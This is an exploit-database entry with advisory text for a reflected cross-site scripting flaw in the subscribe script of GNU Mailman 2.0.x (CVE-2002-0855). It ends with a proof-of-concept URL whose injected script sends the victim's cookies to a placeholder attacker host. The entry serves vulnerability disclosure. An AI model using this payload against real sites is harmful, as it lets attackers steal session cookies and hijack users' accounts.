GNU Mailman 2.0.x - Subscribe Cross-Site Scripting

Author: office
type: remote
platform: cgi
port: 
date_added: 2002-07-24 
date_updated: 2012-10-01 
verified: 1 
codes: CVE-2002-0855;OSVDB-9239 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/5298/info

GNU Mailman is prone to a cross-site scripting vulnerability. Arbitrary HTML and script code are not sanitized from the URI parameters of mailing list subscribe scripts.

An attacker may exploit this issue by creating a malicious link containing arbitrary script code and enticing a web user to visit the link.

http://target/mailman/subscribe/ml-name?info=<script>document.location%3D"http://attackerhost/attackerscript.cgi?"%2Bdocument.cookie;</script>